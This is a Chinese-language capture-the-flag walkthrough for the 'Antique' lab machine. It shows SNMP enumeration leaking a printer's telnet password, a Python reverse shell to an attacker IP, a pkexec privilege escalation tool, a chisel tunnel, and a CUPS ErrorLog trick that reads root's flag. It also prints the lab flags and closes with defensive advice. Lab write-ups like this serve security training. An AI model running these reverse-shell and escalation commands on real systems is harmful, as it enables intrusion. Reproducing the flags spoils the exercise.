[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升
字数 941 2025-08-22 12:23:36

Antique靶机渗透测试教学文档

1. 信息收集

1.1 初始扫描

目标IP: 10.10.11.107

开放端口:

  • TCP 23 (telnet)
  • TCP 161 (SNMP)

使用masscan进行快速端口扫描:

ip='10.10.11.107'; itf='tun0'; 
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then 
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; 
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); 
  if [ -n "$ports" ]; then 
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; 
    nmap -Pn -sV -sC -p "$ports" "$ip"; 
  else 
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; 
  fi; 
else 
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; 
fi

1.2 SNMP信息收集

使用snmpwalk查询SNMP信息:

snmpwalk -v 2c -c public 10.10.11.107

关键OID查询:

snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0

这个OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 指向HP JetDirect打印机设备的MIB,可能包含telnet密码。

2. 获取初始访问权限

2.1 解码SNMP泄露的密码

从SNMP获取的十六进制数据:

50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33

解码命令:

echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33" | tr -d ' ' | xxd -r -p

解码结果: P@ssw0rd@123!!123

2.2 通过telnet登录

使用获取的密码通过telnet登录:

telnet 10.10.11.107

2.3 建立反向shell

在telnet会话中建立反向shell:

exec python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.28",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

3. 权限提升

3.1 获取user flag

位置: /home/user/user.txt
内容: c49ff9dd42d672d82438cd34d246d4ef

3.2 使用TRP00F提权

TRP00F是一个针对pkexec的提权漏洞利用工具。

下载TRP00F:

https://github.com/MartinxMax/trp00f

执行提权:

python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

当询问是否利用pkexec漏洞时选择y

3.3 使用CPUS 1.6.1提权

  1. 检查网络连接:
ss -lnput
  1. 设置chisel服务器:
sudo chisel server --port 10031 --reverse
  1. 客户端连接:
./chisel_1.10.1_linux_amd64 client 10.10.16.28:10031 R:631:127.0.0.1:631
  1. 修改CUPS日志路径获取root flag:
cupsctl ErrorLog="/root/root.txt"
curl http://127.0.0.1:631/admin/log/error_log

root flag内容: f722a52be88fe7afe38d366fa88846c9

4. 关键点总结

  1. SNMP信息泄露:通过查询特定OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 获取telnet密码
  2. 密码解码:十六进制密码需要转换为ASCII
  3. 反向shell建立:使用Python建立反向连接
  4. TRP00F提权:利用pkexec漏洞进行权限提升
  5. CUPS日志读取:通过修改CUPS日志路径读取root flag

5. 防御建议

  1. 禁用不必要的SNMP服务或设置强社区字符串
  2. 避免使用默认或弱密码
  3. 及时更新系统补丁,修复已知漏洞如pkexec
  4. 限制CUPS等服务的管理权限
  5. 实施网络分段,限制内部服务的暴露面
Antique靶机渗透测试教学文档 1. 信息收集 1.1 初始扫描 目标IP: 10.10.11.107 开放端口: TCP 23 (telnet) TCP 161 (SNMP) 使用masscan进行快速端口扫描: 1.2 SNMP信息收集 使用snmpwalk查询SNMP信息: 关键OID查询: 这个OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 指向HP JetDirect打印机设备的MIB,可能包含telnet密码。 2. 获取初始访问权限 2.1 解码SNMP泄露的密码 从SNMP获取的十六进制数据: 解码命令: 解码结果: P@ssw0rd@123!!123 2.2 通过telnet登录 使用获取的密码通过telnet登录: 2.3 建立反向shell 在telnet会话中建立反向shell: 3. 权限提升 3.1 获取user flag 位置: /home/user/user.txt 内容: c49ff9dd42d672d82438cd34d246d4ef 3.2 使用TRP00F提权 TRP00F是一个针对pkexec的提权漏洞利用工具。 下载TRP00F: 执行提权: 当询问是否利用pkexec漏洞时选择 y 。 3.3 使用CPUS 1.6.1提权 检查网络连接: 设置chisel服务器: 客户端连接: 修改CUPS日志路径获取root flag: root flag内容: f722a52be88fe7afe38d366fa88846c9 4. 关键点总结 SNMP信息泄露 :通过查询特定OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 获取telnet密码 密码解码 :十六进制密码需要转换为ASCII 反向shell建立 :使用Python建立反向连接 TRP00F提权 :利用pkexec漏洞进行权限提升 CUPS日志读取 :通过修改CUPS日志路径读取root flag 5. 防御建议 禁用不必要的SNMP服务或设置强社区字符串 避免使用默认或弱密码 及时更新系统补丁,修复已知漏洞如pkexec 限制CUPS等服务的管理权限 实施网络分段,限制内部服务的暴露面